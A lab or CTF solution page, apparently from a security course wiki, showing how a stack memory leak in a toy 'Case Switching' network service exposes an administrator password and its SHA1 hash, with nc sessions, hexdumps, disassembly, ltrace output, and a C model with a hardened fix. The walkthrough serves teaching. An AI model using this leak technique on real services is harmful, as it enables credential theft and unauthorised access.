session:solution:mid-ctf_asks1_3 [2014/07/11 11:08]
rcaragea created
session:solution:mid-ctf_asks1_3 [2020/07/19 12:49] (current)
====== CTF Tasks 1 & 3 ======

We are presented with two binaries that do almost the same thing. Let's see exactly what:

===== Task 1 =====

<code bash>
# ./caseservice pass 4242
Server-side debug: login password is set to [example]

.... in another terminal:
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)

1
You selected [1]
Input: input size and then <size> bytes
10
Bla bla bla
Here you go:
bLABLABL

# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)

2
You selected [2]
Configuration is done through a shell
What is the administrator password?
password
Unauthorized login attempted.
</code>

So, as the name implies, it switches the case of the input. How does it do that? We turn to the assembly of the function named **handle_use**, where we see this loop:
<code asm>
   0x08048e16 <+116>: mov    DWORD PTR [ebp-0xc],0x0
   0x08048e1d <+123>: jmp    0x8048e41 <handle_use+159>
   0x08048e1f <+125>: lea    edx,[ebp-0x4c6]
   0x08048e25 <+131>: mov    eax,DWORD PTR [ebp-0xc]
   0x08048e28 <+134>: add    eax,edx
   0x08048e2a <+136>: movzx  eax,BYTE PTR [eax]
   0x08048e2d <+139>: xor    eax,0x20
   0x08048e30 <+142>: lea    ecx,[ebp-0x4c6]
   0x08048e36 <+148>: mov    edx,DWORD PTR [ebp-0xc]
   0x08048e39 <+151>: add    edx,ecx
   0x08048e3b <+153>: mov    BYTE PTR [edx],al
   0x08048e3d <+155>: add    DWORD PTR [ebp-0xc],0x1
   0x08048e41 <+159>: mov    eax,DWORD PTR [ebp-0x4cc]
   0x08048e47 <+165>: cmp    DWORD PTR [ebp-0xc],eax
   0x08048e4a <+168>: jb     0x8048e1f <handle_use+125>
</code>

So it XORs all of the input with 0x20 (the bit that distinguishes upper-case from lower-case ASCII letters), regardless of whether the input consists of letters, digits, symbols, etc. The loop counter at [ebp-0xc] runs up to the size stored at [ebp-0x4cc], not up to the number of bytes actually received.
A question you should ask yourself is why it needs to know the input size at all. Let's fiddle with it:

<code bash>
# nc 127.0.0.1 4242
==============================================
Welcome to the Case Switching service
==============================================
Make your choice (1 or 2):
1. Use service
2. Configure service (only for administrators)

1
You selected [1]
Input: input size and then <size> bytes
10
A
Here you go:
....... (binary)
</code>

Interesting: we get lots of unknown binary data back. Maybe there's something useful in there. Let's redirect the output to a file.
<code bash>
# nc 127.0.0.1 4242 > out
1
255

# hexdump -Cv out
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
00000130  f9 97 ec c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..      !   t.|
00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
000001d0  24 28 28 e0 24 28 27 20  20 20 74 c9 df 9f 27 20  |$((.$('   t...' |
000001e0  20 20 20 20 20 20 e3 69  bc 07 09 53 2a 5f a0 5e  |      .i...S*_.^|
000001f0  db a6 56 89 0d eb 4f aa  1f af 45 58 41 4d 50 4c  |..V...O...EXAMPL|
00000200  45 20 20 08 08 08 08 08  08 08 08 08 08 08 08 08  |E  .............|
00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
00000220  a1 a1 a1                                          |...|
00000223
</code>
There's our password, with its case switched! Let's try the same on the remote system.
<code bash>
# hexdump -Cv out
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
00000130  f9 97 ec c8 df 9f 40 20  20 20 2c 20 20 20 30 8a  |......@   ,   0.|
00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..      !   t.|
00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
000001d0  24 28 28 e0 24 28 2c 20  20 20 74 c9 df 9f 27 20  |$((.$(,   t...' |
000001e0  20 20 20 20 20 20 68 0e  5b fd 7b 7d 73 03 bc ac  |      h.[.{}s...|
000001f0  0a 3f 60 6f 4e 46 f9 c7  85 57 49 4e 54 45 4c 4c  |.?`oNF...WINTELL|
00000200  49 47 45 4e 43 45 20 20  08 08 08 08 08 08 08 08  |IGENCE  ........|
00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
00000220  a1 a1 a1                                          |...|
00000223
</code>
So the password seems to be "wintelligence", but note that "EXAMPLE" in the first listing started at offset 0x1fa, and at 0x1fa in the second listing is the "I" of "INTELLIGENCE".
Trying "intelligence" works and we are able to log in.

===== Task 3 =====
This task is supposedly more secure. Let's see just how secure by doing almost the same thing as before and inspecting the output with **hexdump**:
<code bash>
# nc 127.0.0.1 4242 > out
1
255

# hexdump -Cv out
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 2a df af 1f  aa 4f a0 df 9a 97 74 8e  |go:.*....O....t.|
00000130  f4 97 20 e0 24 28 20 30  22 20 48 e1 24 28 0d cc  |.. .$( 0" H.$(..|
00000140  e1 97 68 98 f4 97 20 20  20 20 68 c9 df 9f e9 13  |..h...    h.....|
00000150  f9 97 fc c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
00000160  e1 97 20 20 20 20 e0 cf  df 97 20 d9 df 97 20 20  |..    .... ...  |
00000170  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 31 20  |  .."  0  &q..1 |
00000180  20 20 20 90 dd 97 20 30  20 20 21 20 20 20 74 8e  |   ... 0  !   t.|
00000190  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 ae 9a  |..(.$(        ..|
000001a0  e1 97 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |..(.$(        t.|
000001b0  f4 97 28 e0 24 28 20 20  20 20 58 cd df 9f 5c f3  |..(.$(    X...\.|
000001c0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
000001d0  20 20 58 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  X...P...    t.|
000001e0  f4 97 20 20 20 20 20 20  20 20 58 cd df 9f 1d ad  |..        X.....|
000001f0  24 28 28 e0 24 28 27 20  20 20 50 c9 df 9f 68 20  |$((.$('   P...h |
00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
00000210  01 0a                                             |..|
00000212
</code>
So even though we ask for 255 bytes, it returns considerably fewer. Why is that?
In task 1, handle_use ended like this:
<code asm>
   0x08048e47 <+165>: cmp    DWORD PTR [ebp-0xc],eax
   0x08048e4a <+168>: jb     0x8048e1f <handle_use+125>
   0x08048e4c <+170>: mov    eax,DWORD PTR [ebp-0x4cc]
   0x08048e52 <+176>: mov    DWORD PTR [esp+0x8],eax
   0x08048e56 <+180>: lea    eax,[ebp-0x4c6]
   0x08048e5c <+186>: mov    DWORD PTR [esp+0x4],eax
   0x08048e60 <+190>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048e63 <+193>: mov    DWORD PTR [esp],eax
   0x08048e66 <+196>: call   0x8048ab0 <write@plt>
   0x08048e6b <+201>: leave
   0x08048e6c <+202>: ret
</code>
Task 3 ends it like this:
<code asm>
   0x08048de6 <+162>: cmp    DWORD PTR [ebp-0xc],eax
   0x08048de9 <+165>: jb     0x8048dbe <handle_use+122>
   0x08048deb <+167>: lea    eax,[ebp-0x4c6]
   0x08048df1 <+173>: mov    DWORD PTR [esp],eax
   0x08048df4 <+176>: call   0x80489f0 <puts@plt>
   0x08048df9 <+181>: leave
   0x08048dfa <+182>: ret
</code>
So instead of a **write** of the requested size it does a **puts**, which stops at the first NULL byte. Note that the XOR loop is unchanged: it still runs over the requested size, so the stale data is still transformed in place, it just is not all sent. We can bypass this by supplying as input exactly as many bytes as there are up to that NULL byte.
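A C model of the two handle_use variants next to a hardened form, added here as an example; it is not code from the challenge binaries. The buffer is passed in so that stale contents can be seeded, and the 255-byte request limit is assumed from the dumps above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x4c6   /* the stack buffer at [ebp-0x4c6] in the disassembly */
#define MAX_REQ  255     /* assumed: the largest size the service accepts */

/* Model of handle_use in both binaries. `buf` stands in for the stack buffer and is
 * supplied by the caller so that stale contents can be seeded. The client's bytes are
 * copied in, then the XOR loop runs up to `size`, the number the client asked for,
 * exactly as the disassembly does. Task 1 then write()s `size` bytes; Task 3 puts()es
 * the buffer, which stops at the first NUL. Returns the number of bytes sent (in `out`,
 * which must hold BUF_SIZE bytes). */
static size_t handle_use_model(uint8_t *buf, size_t size, const uint8_t *in,
                               size_t received, uint8_t *out, int use_puts)
{
    if (size > MAX_REQ) size = MAX_REQ;
    if (received > size) received = size;
    memcpy(buf, in, received);                 /* only these bytes are fresh... */
    for (size_t i = 0; i < size; i++)          /* ...but the loop runs to `size` */
        buf[i] ^= 0x20;
    if (!use_puts) {                           /* Task 1: write(fd, buf, size) */
        memcpy(out, buf, size);
        return size;
    }
    size_t n = 0;                              /* Task 3: puts(buf) */
    while (n < BUF_SIZE && buf[n] != 0)
        n++;
    memcpy(out, buf, n);
    return n;
}

/* Hardened form: only bytes that were actually received are transformed and sent, the
 * transform is limited to ASCII letters so it can never produce a NUL or control byte,
 * and the buffer is wiped afterwards so a later request cannot read the leftovers. */
static size_t handle_use_fixed(uint8_t *buf, size_t size, const uint8_t *in,
                               size_t received, uint8_t *out)
{
    if (size > MAX_REQ) size = MAX_REQ;
    if (received > size) received = size;
    memcpy(buf, in, received);
    for (size_t i = 0; i < received; i++) {
        uint8_t c = buf[i];
        if ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z'))
            buf[i] = c ^ 0x20;
    }
    memcpy(out, buf, received);
    memset(buf, 0, BUF_SIZE);   /* for a real automatic buffer use explicit_bzero() */
    return received;
}

/* Constructed scenario: an earlier request left "s3cr3t" at offset 10 of the buffer,
 * NUL-terminated at offset 20, with 'x' everywhere else. Runs one request and returns
 * how many bytes the client gets back in `out`. */
static size_t simulate(const char *input, size_t size, int use_puts, int hardened,
                       uint8_t *out)
{
    uint8_t buf[BUF_SIZE];
    memset(buf, 'x', sizeof buf);
    memcpy(buf + 10, "s3cr3t", 6);
    buf[20] = 0;
    size_t received = strlen(input);
    if (hardened)
        return handle_use_fixed(buf, size, (const uint8_t *)input, received, out);
    return handle_use_model(buf, size, (const uint8_t *)input, received, out, use_puts);
}

int main(void)
{
    uint8_t out[BUF_SIZE];
    size_t n = simulate("Blab", 16, 0, 0, out);   /* send 4 bytes, ask for 16 */
    printf("task 1 model sent %zu bytes:", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", out[i]);
    printf("\ntask 3 model sent %zu bytes\n", simulate("Blab", 16, 1, 0, out));
    printf("hardened sent %zu bytes\n", simulate("Blab", 16, 0, 1, out));
    return 0;
}
```

With a space in the input the Task 3 model sends only 3 bytes, because ' ' ^ 0x20 is the NUL that puts stops at; without one it runs past the requested 16 bytes to the NUL at offset 20 and leaks the seeded secret.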

Let's try 210 bytes.
<code bash>
# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 2a 20  20 20 50 c9 df 9f 68 20  |AAAAAA*   P...h |
00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
00000210  01 0a                                             |..|
00000212
</code>
We seem to need 2 + 8 + 8 + 8 + 2 = 28 more bytes to get past the NULL, so we try 238 bytes:
<code bash>
# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000210  41 41 2a 69 bc 07 09 53  2a 5f a0 5e db a6 56 89  |AA*i...S*_.^..V.|
00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|
0000022a
</code>
To get past the next NULL byte we would need 238 + 6 + 8 + 8 + 2 = 262 bytes, which is more than we can send.
Before digging into the assembly, let's do some dynamic analysis:
<code bash>
# ltrace ./caseservice_reload pass 4242
__libc_start_main(0x8048fab, 3, 0xbfffee84, 0x80491d0 <unfinished ...>
fopen("pass", "r"                                                                                                                     = 0x804c008
fgets("example\n", 1000, 0x804c008)                                                                                                     = 0xbfffe988
strlen("example\n"                                                                                                                    = 8
printf("Server-side debug: login passwor"..., "example"Server-side debug: login password is set to [example]
)                                                                                = 54
SHA1(0xbfffe988, 7, 0xbfffe970, 72)                                                                                                     = 0xbfffe970
fclose(0x804c008)                                                                                                                       = 0
atoi(0xbffff079, 0, 0x2cb4304e, 1)                                                                                                      = 4242
socket(2, 1, 0)                                                                                                                         = 3
bzero(0xbfffedb8, 16)                                                                                                                   = <void>
inet_addr("000.0.0.0"                                                                                                                 = 0
htons(4242, 16, 0, 1)                                                                                                                   = 0x9210
setsockopt(3, 1, 2, 0xbfffedcc)                                                                                                         = 0
bind(3, 0xbfffedb8, 16, 0xbfffedcc)                                                                                                     = 0
listen(3, 5, 16, 0xbfffedcc)                                                                                                            = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc)                                                                                           = 4
fork()                                                                                                                                  = 18145
close(4)                                                                                                                                = 0
accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc <no return ...>
--- SIGCHLD (Child exited) ---
</code>
Notice the SHA1 call. If we look into **handle_configure** we see that the comparison (memcmp) is done against the hash of our input as well.
Since the SHA1 of the correct password is computed at every program start, maybe it's still on the stack. Let's check the hash of "example":
<code bash>
# echo -n "example" | sha1sum
c3499c2729730a7f807efb8676a92dcb6f8a3f8f  -
</code>

Looking for the beginning of the hash, it doesn't seem to be in our hexdump. But the end is there:
<code bash>
00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|
</code>
Why would only 3 bytes of it be there? Remember the XOR loop: 0x6f XOR 0x20 = 0x4f, which is exactly the byte preceding these 3 bytes. Extrapolating, we see the whole hash with its first 17 bytes XORed, thus easily recoverable.

Let's try remote:
<code bash>
# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
